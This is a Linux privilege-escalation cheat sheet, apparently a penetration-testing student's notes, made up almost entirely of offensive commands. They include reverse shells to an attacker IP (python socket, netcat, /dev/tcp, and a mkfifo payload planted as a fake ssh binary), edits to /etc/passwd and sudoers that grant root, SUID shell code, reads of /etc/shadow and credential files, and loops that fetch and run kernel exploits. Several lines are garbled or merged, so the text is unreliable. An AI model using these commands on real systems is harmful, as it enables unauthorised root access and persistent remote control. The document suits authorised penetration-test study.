Linux File System
MindMap for PE
Linux elevation of privileges, manual testing
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- Miss-configured services (cronjobs)
- any running as a privileged user?
- Incorrect file permissions (exportfs, sudo)
- Miss-configured environment ($PATH)
- Binary with SUID bit
- Software or OS with known vulnerabilities
Read http://touhidshaikh.com/blog/?p=790
If you get an error "su: must be run from a terminal" use one of the shell fixes above
root ALL=(ALL) ALLThe root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
jelly ALL= /sbin/poweroffThe user jelly can from any terminal, run the command power off using jelly's user password.
jelly ALL = (root) NOPASSWD: /usr/bin/findThe user jelly can from any terminal, run the command find as root user without password.
Are you a sudo user already? Do you have access to powerful commands like chown or chmod?
Are you part of the sudo group, but not in the sudoers file?
What can we run with sudo?
Try su as all users and the username as password
User bash history
cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
grep -vE "nologin|false" /etc/passwd
look for something(s) that are running which is not standard
if things are here that are not on the nmap scan - could be a firewall rule blocking it is mysql in there? If so creds will be stored somewhere on the box
dpkg -l | awk '$1 ~ /ii/{print $2,$3}'rpm -qa
FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
Copy /tmp/packages.txt which it has created back to your machine and then run
#download thishttps://github.com/rowbot1/burmatscripts/blob/master/bash/vuln_pkg_lookup.sh
./pkg_loookup.sh packages.txt
# Common locations for user installed software/usr/local//usr/local/src/usr/local/bin/opt//home/var//usr/src/# Debiandpkg -l# CentOS, OpenSuse, Fedora, RHELrpm -qa (CentOS / openSUSE )# OpenBSD, FreeBSDpkg_info
find . -iname 'config' 2>/dev/null
Research where creds would be stored on certain webapps
What services are running as root?:
Look for vulnerable/privileged components such as: mysql, sudo, udev, python
If /etc/exports if writable, you can add an NFS entry or change and existing entry adding the no_root_squash flag to a root directory, put a binary with SUID bit on, and get root.
crontab -l 2>/dev/nullls -alh /var/spool/cron 2>/dev/nullls -al /etc/ | grep cron 2>/dev/nullls -al /etc/cron* 2>/dev/nullcat /etc/cron* 2>/dev/nullcat /etc/at.allow 2>/dev/nullcat /etc/at.deny 2>/dev/nullcat /etc/cron.allow 2>/dev/nullcat /etc/cron.deny 2>/dev/nullcat /etc/crontab 2>/dev/nullcat /etc/anacrontab 2>/dev/nullcat /var/spool/cron/crontabs/root 2>/dev/null
If there is a cronjob that runs as run but it has incorrect file permissions, you can change it to run your SUID binary and get a shell.
The following command will list processes running by root, permissions and NFS exports.
echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Use netstat to find other machines connected
idsusudo -lcat /etc/passwdcat /etc/shadowcat /etc/groupcat /etc/sudoers # who is in there are you?ls -alh /var/mail/ls -ahlR /rootls -ahlR /home/
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' #any other super users?
You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
Its important to upgrade your shell as you may run a command which outputs to the terminal. If you don't upgrade it you wont see the output. IE running exploits.
Allows history commands as well as editing commands
ssh user@$ip nc $localip 4444 -e /bin/shenter user's passwordpython -c 'import pty; pty.spawn("/bin/sh")'export TERM=linux
python -c 'import pty; pty.spawn("/bin/sh")'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'echo os.system('/bin/bash')/bin/sh -iperl —e 'exec "/bin/sh";'perl: exec "/bin/sh";ruby: exec "/bin/sh"lua:os.execute('/bin/sh')From within IRB:exec "/bin/sh"From within vi: :!bash or:set shell=/bin/bash:shellFrom within vim ':!bash':From within nmap: !shFrom within tcpdumpecho $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z rootFrom busybox /bin/busybox telnetd -|/bin/sh -p9999#if /bin/bash has suid bit set, note the -p optionbash -p >& /dev/tcp/$ipkaliip/444 0>&1
find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
The file will run as the owner no matter who executes it. So if root owns it, we can run it and hijack it to become root
If you have found a, download it to your box and open it in Ghidra. Check the main function to view decompiled commands interesting binary
ltrace ./binary# step through binary may result in revealing password if password is needed to run it
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null
find / -perm -o x -type d 2>/dev/null
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). The reason for this redirect is that we aren't interested in things that we can't access, and access denied errors can fill up a terminal pretty fast.
Adding a binary to PATH, to hijack another SUID binary invokes it without the fully qualified path.
function /usr/bin/foo () { /usr/bin/echo "It works"; }export -f /usr/bin/foo/usr/bin/fooIt works
If you can get root to execute anything, the following will change a binary owner to him and set the SUID flag:
chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;
#look for the string password in files in the current directorygrep -rwl "password"
ps -ef cat /etc/services dpkg -l rpm -qa
An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box
If MYSQL is running as root, you can run commands using sys_exec(). For instance, to add user to sudoers:
ps -aux | grep root | grep mysql
sys_exec('usermod -a -G admin username')
More about MYSQL:
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
Command to skip ignored lines in config files
alias nonempty="egrep -v '^[ \t]*#|^$'"
Find Linux distribution & version
cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
Check versions - use in conjunction with searchsploit
dpkg -lrpm -qahttpd -vmysql --versionpython --versionruby -v
cat /etc/*releaseuname -m
cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
Find printers
ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/*;
find /etc/ -writable -type f 2>/dev/null
cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny'
grep -i user [filename]grep -i pass [filename]grep -C 5 "password" [filename]find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
/sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname
List other users home directories
ls -ahlR /root/; ls -ahlR /home/
User mails
cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
Find interesting binaries
find / -name wget 2>/dev/null; find / -name nc* 2>/dev/null; find / -name netcat* 2>/dev/null; find / -name tftp* 2>/dev/null; find / -name ftp 2>/dev/null
mount; df -h; cat /etc/fstab
If you can just change PATH, the following will add a poisoned ssh binary:
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh
#Ippsec demoing $PATH PEhttps://www.youtube.com/watch?v=3VxZNflJqsw
Generating SUID C Shell for /bin/bash
int main(void){ setresuid(0, 0, 0); system("/bin/bash");}
Without interactive shell
echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
If /etc/passwd has incorrect permissions, you can root:
echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
or
openssl passwd#put in password, output is random sting#pass this on the x part of root in /etc/passwdsu root using the password u set
Add user www-data to sudoers without password
chmod 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
If you can sudo chmod:
echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c $ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
Wildcard injection if there is a cron with a wildcard in the command line, you can create a file, whose name will be passed as an argument to the cron task, For more info:
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
compile exploit fix error
gcc 9545.c -o 9545 -Wl,--hash-style=both
Find other uses in the system
$id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
grep home /etc/passwd|cut -d: -f1
cho "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o w -perm -o x \) -type d 2>/dev/null;
Find world-readable files:
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
Find nobody owned files
ind /dir -xdev \( -nouser -o -nogroup \) -print
Add user to sudoers in python.
#!/usr/bin/env pythonimport osimport systry: os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')except: sys.exit()
Ring0 kernel exploit for 2.3/2.4
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
tcpdump tcp port 80 -w output.pcap -i eth0
Creates folder /tmp/rowbot and copies files on kali web server to target
wget -nd -np -R "index.html*" -P /tmp/rowbot --recursive http://kali$ip
What is running, any cron jobs any scripts? Use PSPY to find out
https://github.com/DominicBreuker/pspy
Useful script to run for initial scan - displays info on box
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.shsed -i -e 's/\r$//' bangenum.sh./bangenum.sh
Use this tool first to help you get in the PE mindset.
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/Anon-Exploiter/SUID3NUM
The following script runs exploit suggester and automatically downloads and executes suggested exploits:
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
USAGE: xploit_installer.py <exploit id>
47: shellshock48: heartbleed
automated kernel vulnerability enumeration and exploitation
https://github.com/spencerdodd/kernelpop
49: linux-exploit-suggester50: unix_privesc_check51: kernel 2.4.x / 2.6.x (sock_sendpage 1)52: kernel 2.4 / 2.6 (sock_sendpage 2)53: kernel < 2.6.22 (ftruncate)54: kernel < 2.6.34 (cap_sys_admin)55: kernel 2.6.27 < 2.6.36 (compat)56: kernel < 2.6.36-rc1 (can bcm)57: kernel <= 2.6.36-rc8 (rds protocol)58: *kernel < 2.6.36.2 (half nelson)59: *kernel <= 2.6.37 (full nelson)60: kernel 2.6 (udev)61: kernel 3.13 (sgid)62: kernel 3.13.0 < 3.19 (overlayfs 1)63: kernel 3.14.5 (libfutex)64: kernel 2.6.39 <= 3.2.2 (mempodipper)65: *kernel 2.6.28 / 3.0 (alpha-omega)66: kernel 2.6.22 < 3.9 (Dirty Cow)67: kernel 3.7.6 (msr)68: *kernel < 3.8.9 (perf_swevent_init)69: kernel <= 4.3.3 (overlayfs 2)70: kernel 4.3.3 (overlayfs 3)71: kernel 4.4.0 (af_packet)72: kernel 4.4.x (double-fdput)73: kernel 4.4.0-21 (netfilter)74: *kernel 4.4.1 (refcount)
wget http://www.securitysift.com/download/linuxprivchecker.py
- Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation:
-
-
- CVE-2012-0056
-
-
- Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method):
-
- CVE-2016-5195
-
- Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
-
-
- CVE-2003-0127
-
-
- Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1)
-
exploit/linux/local/udev_netlink
-
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
Other scripts:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
Remember to run them again if you get a user shell not just www-data shell
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh -t -r report.txt
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
wget https://www.rebootuser.com/?p=1758
Always be sure to read the comments in exploits they inform you about which systems and version are vulnerable, which parts of the script need modification & which compilation flags to use. $targetip 32 bit or 64 bit? Be mindful of this when compiling exploits.
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
https://www.exploit-db.com/exploits/37292
https://www.exploit-db.com/exploits/15285/
https://www.exploit-db.com/exploits/15704/
https://git.zx2c4.com/CVE-2012-0056/about/
wget -O exploit.c <http://www.exploit-db.com/download/18411> gcc -o mempodipper exploit.c ./mempodipper
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
gcc -m32 -o output32 hello.c #(32 bit)gcc -m64 -o output hello.c # (64 bit)
https://www.exploit-db.com/exploits/15285/
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "